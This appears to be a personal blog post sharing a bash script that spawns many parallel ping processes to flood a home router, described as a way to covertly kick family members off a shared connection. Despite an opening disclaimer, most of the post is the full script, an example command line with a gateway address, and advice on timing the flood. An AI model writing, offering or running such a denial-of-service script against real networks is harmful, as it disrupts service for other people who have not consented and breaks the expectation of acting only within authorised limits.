Disclaimer: The following article is written for entertainment and educational purposes only. Neither the script shown here nor any of the techniques involved are intended to be used in real life. Launching denial-of-service attacks is illegal and can get you in serious trouble. I do not condone or support any use of such hacking methods for anything other than pen-testing purposes.
Haven’t written anything about either pen-testing or Linux shell scripting recently, so I thought I’d share a neat script I wrote several years ago that I used to use quite frequently. Back when I was a young whippersnapper in my early twenties and living with my parents in a house with a crappy Internet connection, I used to fight endlessly with my family members over bandwidth. Not in the sense that I was arguing with them over it, but in the sense that I was launching covert attacks to kick them off the network so that I could get more bandwidth for myself. It could get annoying trying to connect to a site while someone else was hogging all the bandwidth by streaming video in another room, so I thought why not disrupt their connection so that I would be allowed through?
The following script works by launching a denial-of-service attack against the local router. It sends a timed ping flood which overloads the router and causes it to go temporarily offline, effectively kicking everyone else off the network. The script will wait for a certain duration and then stop the ping flood, and at this point you’ll be able to get a request through because you’ll be the only one on the network. I know ping flooding has been rendered largely obsolete by the introduction of better DDoS protection with services like CloudFlare, but the attack I devised should still work, because there is no DDoS protection built into small home routers.
The script looks like this (just remember that I don’t condone anyone using it IRL):
1 #!/usr/bin/env bash 2 # Local denial-of-service script 3 4 host="$1" 5 shift 6 declare -i npings=50 7 declare -i duration=5 8 9 # Set parameters: 10 while getopts ":n:t:" opt 11 do 12 case $opt in 13 n) let npings=$OPTARG;; 14 t) let duration=$OPTARG;; 15 \?) echo "Usage: source dos.sh host [-n npings] [-t duration]" >&2;; 16 esac 17 done 18 19 # Launch DoS attack: 20 for (( i=0; $i<$npings; i++ )) 21 do 22 ping "$host" > /dev/null & 23 done 24 25 # Wait and stop attack: 26 sleep $duration 27 killall ping 28 29 # Cleanup: 30 unset opt i host npings duration
The way this script would be used would be to run it at the command line with a command like this:
$ source dos.sh 192.168.10.1 -n 50 -t 5
$duration seconds for the prompt to reappear, then do whatever you want to do on the network. (
$host should ideally be the IP address of the local WiFi router; I just used a common default gateway address as an example. Since it’s a local IP address, you can’t actually use it to attack anyone on the Internet.)
I know I could have used the
-c $duration option here, but if you were to actually use this in real life (which, again, I’m not suggesting anyone do) you would quickly discover a problem if this method is used, which is that you wouldn’t be alerted when the ping flood is finished, so you wouldn’t know the proper time to put your Internet request through. Using
killall makes things easier, because you can just wait for the prompt to reappear.
Well, that’s about all for today. This article was a little shorter and less involved than what I usually do, but I think it was a good break from routine. Farewell and happy hacking!